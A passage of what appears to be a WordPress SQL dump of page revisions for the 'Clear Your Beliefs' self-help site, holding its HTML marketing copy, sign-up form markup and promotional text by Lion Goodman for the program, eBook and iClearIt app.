practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p style="text-align: center"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-22 19:18:29', '2014-10-23 00:18:29', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1579, 2, '2014-10-23 10:49:53', '2014-10-23 15:49:53', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nSpecial Program\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> </strong></p>\n\nWhat You Can Accomplish with <em>Clear Your Beliefs</em>\n\nRelease hurt and pain from the past\nClear resistance to taking action\nOpen to new possibilities\nEliminate blocks to manifestation\nFind your true purpose\nDelete what’s been holding you back\n\nChange your personality style\nOpen to deeper, more profound love\nRecognize your spiritual nature\nBecome less reactive, more calm\nRediscover the source of your personal power\n\nHow and Why It Works\n\nBeliefs are the major cause of upset and unhappiness\nCYB clears beliefs at the core of the psyche, where they live\nAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)\nYou take charge and decide what you want to believe\nYou’re guided gently, step-by-step, through the entire process\nYou decide how far to go, and what changes to make\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n<h3 style="text-align: center">Are you a Coach?  Therapist? Healer?  Change Agent?</h3><p style="text-align: center">Bring the <em>Clear Your Beliefs</em> process into your practice. </p><p style="text-align: center">Help your clients clear their beliefs so they can move their lives forward.</p><p style="text-align: center"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-23 10:49:53', '2014-10-23 15:49:53', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1802, 2, '2014-11-19 21:50:02', '2014-11-20 02:50:02', '<a href="#" class="jp-play" tabindex="1">play</a>\n<a href="#" class="jp-pause" tabindex="1">pause</a>\n<a href="#" class="jp-stop" tabindex="1">stop</a>\n\n<a href="#" class="jp-full-screen" tabindex="1">full screen</a>\n<a href="#" class="jp-restore-screen" tabindex="1">restore screen</a>\n\n<p>Free eBook</p><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /><p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p><p></p>FIRST NAME * EMAIL * <p>  </p><p>Free App</p><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /><p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p><p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p><p></p><p> </p> <p> </p><p>  </p>Complete Program\n<img style="margin-top: 0px !important;width: 100% !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center;margin-top: 51px;font-size: 16px"><strong>Clear Your Limiting and Negative Beliefs</strong> – <strong>Permanently!</strong></p>', 'NewCYB', '', 'inherit', 'closed', 'open', '', '1793-revision-v1', '', '', '2014-11-19 21:50:02', '2014-11-20 02:50:02', '', 1793, 'http://clearyourbeliefs.com/1793-revision-v1', 0, 'revision', '', 0),
(1800, 2, '2014-11-19 21:47:58', '2014-11-20 02:47:58', '<a href="#" class="jp-play" tabindex="1">play</a>\n<a href="#" class="jp-pause" tabindex="1">pause</a>\n<a href="#" class="jp-stop" tabindex="1">stop</a>\n\n<a href="#" class="jp-full-screen" tabindex="1">full screen</a>\n<a href="#" class="jp-restore-screen" tabindex="1">restore screen</a>\n\n<p>Free eBook</p><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /><p class="tri-panel-p tri-panel-1st-p" style="text-align: center;padding-top: 30px !important;margin: 0px"><strong>Download the free eBook.</strong></p><p></p>FIRST NAME * EMAIL * <p> </p><p>[10:44:27 AM] Reuben Limos: Free App</p><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /><p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center;margin-top: 30px"><strong>DOWNLOAD the FREE APP</strong></p><p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center;font-size: 14px;margin-bottom: -2px">Start Clearing Whatever Is In The Way Right Now!</p><p></p><p></p> <p> </p><p> </p><p>Complete Program</p><p><img style="margin-top: 0px !important;width: 100% !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" /></p><p class="tri-panel-p tri-panel-3rd-p" style="text-align: center;margin-top: 51px;font-size: 16px"><strong>Clear Your Limiting and Negative Beliefs</strong> – <strong>Permanently!</strong></p><p></p><p></p>', 'NewCYB', '', 'inherit', 'closed', 'open', '', '1793-revision-v1', '', '', '2014-11-19 21:47:58', '2014-11-20 02:47:58', '', 1793, 'http://clearyourbeliefs.com/1793-revision-v1', 0, 'revision', '', 0),
(1799, 2, '2014-11-19 21:45:58', '2014-11-20 02:45:58', '<a href="#" class="jp-play" tabindex="1">play</a>\n<a href="#" class="jp-pause" tabindex="1">pause</a>\n<a href="#" class="jp-stop" tabindex="1">stop</a>\n\n<a href="#" class="jp-full-screen" tabindex="1">full screen</a>\n<a href="#" class="jp-restore-screen" tabindex="1">restore screen</a>\n\n<p>Free eBook&lt;center style="margin-bottom: -30px; margin-top: 15px;"&gt;&lt;img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /&gt;&lt;/center&gt;&lt;p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"&gt;&lt;strong&gt;Download the free eBook.&lt;/strong&gt;&lt;/p&gt;&lt;form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"&gt;&lt;input name="inf_form_name" type="hidden" value="Sign up for free  Clear Your Beliefs eBook" /&gt;&lt;input name="infusionsoft_version" type="hidden" value="1.35.0.43" /&gt;&lt;div class="infusion-field"&gt;&lt;label class="form-label" for="inf_field_FirstName"&gt;FIRST NAME *&lt;/label&gt;&lt;input required id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /&gt;&lt;/div&gt;&lt;div class="infusion-field"&gt;&lt;label class="form-label" for="inf_field_Email"&gt;EMAIL *&lt;/label&gt;&lt;input required id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /&gt;&lt;/div&gt;&lt;div class="form-input-container-button"&gt;&lt;input class="form-input-button" type="submit" value="GET ACCESS NOW" /&gt;&lt;/div&gt;&lt;/form&gt;&lt;script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"&gt;&lt;/script&gt;</p>&nbsp;&nbsp;', 'NewCYB', '', 'inherit', 'closed', 'open', '', '1793-revision-v1', '', '', '2014-11-19 21:45:58', '2014-11-20 02:45:58', '', 1793, 'http://clearyourbeliefs.com/1793-revision-v1', 0, 'revision', '', 0),
(1801, 2, '2014-11-19 21:48:48', '2014-11-20 02:48:48', '<a href="#" class="jp-play" tabindex="1">play</a>\n<a href="#" class="jp-pause" tabindex="1">pause</a>\n<a href="#" class="jp-stop" tabindex="1">stop</a>\n\n<a href="#" class="jp-full-screen" tabindex="1">full screen</a>\n<a href="#" class="jp-restore-screen" tabindex="1">restore screen</a>\n\n<p>Free eBook</p><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /><p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p><p></p>FIRST NAME * EMAIL * <p>  </p><p>Free App</p><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /><p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center;margin-top: 30px"><strong>DOWNLOAD the FREE APP</strong></p><p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center;font-size: 14px;margin-bottom: -2px">Start Clearing Whatever Is In The Way Right Now!</p><p></p><p></p> <p> </p><p> </p><p>Complete Program</p><p><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" /></p><p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><strong>Clear Your Limiting and Negative Beliefs</strong> – <strong>Permanently!</strong></p><p></p><p> </p>', 'NewCYB', '', 'inherit', 'closed', 'open', '', '1793-revision-v1', '', '', '2014-11-19 21:48:48', '2014-11-20 02:48:48', '', 1793, 'http://clearyourbeliefs.com/1793-revision-v1', 0, 'revision', '', 0),
(1680, 2, '2014-11-11 18:50:48', '2014-11-11 23:50:48', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="641" height="155" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center; margin-top:30px; margin-bottom:0px;">Download the free eBook.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 8px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png">\n<p style="text-align: center; margin-top: 15px; font-size: 18px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-11 18:50:48', '2014-11-11 23:50:48', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1668, 2, '2014-11-06 21:15:40', '2014-11-07 02:15:40', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n<p style="text-align: center;margin-top:50px;margin-bottom:0px">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 64px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png">\n<p style="text-align: center; margin-top: 15px; font-size: 18px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<p style="text-align: center; margin-top: 15px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, &#038;\nLimit Your True Magnificence\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-06 21:15:40', '2014-11-07 02:15:40', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1595, 2, '2014-10-23 23:20:18', '2014-10-24 04:20:18', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nalert(''test'');\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD the FREE APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nComplete Program\n<p style="text-align: center;"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> </strong></p>\n\nThe <em>Clear Your Beliefs</em> Program will help you:\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\nHow and Why It Works So Well\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-23 23:20:18', '2014-10-24 04:20:18', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1581, 2, '2014-10-23 15:17:08', '2014-10-23 20:17:08', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center"><strong>DOWNLOAD the FREE iClearIt App</strong></p>\n\n<p style="text-align: center;font-size: 14px;margin-bottom: 46px">Start Clearing Whatever Is In The Way Right Now!\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nSpecial Program\n<p style="text-align: center"><strong>Learn about</strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center"> <strong>Clear Your Limiting and\nNegative Beliefs Permanently.</strong>\n\n<p style="text-align: center"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center;margin-bottom: -5px"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> </strong></p>\n\nWhat You Can Accomplish with <em>Clear Your Beliefs</em>\n\nFinally release pain and hurts from the past\nClear resistance that stops you from taking action\nOpen yourself to new possibilities of love, work and success\nEliminate the blocks that prevent you from getting what you want\nFind your true purpose and express your true magnificence\nPermanently delete whatever’s been holding you back\n\nChange your personality style\nOpen to deeper, more profound love\nRecognize your spiritual nature\nBecome less reactive, more calm\nRediscover the source of your personal power\n\nHow and Why It Works\n\nBeliefs are the major cause of upset and unhappiness\nCYB clears beliefs at the core of the psyche, where they live\nAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)\nYou take charge and decide what you want to believe\nYou’re guided gently, step-by-step, through the entire process\nYou decide how far to go, and what changes to make\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?” 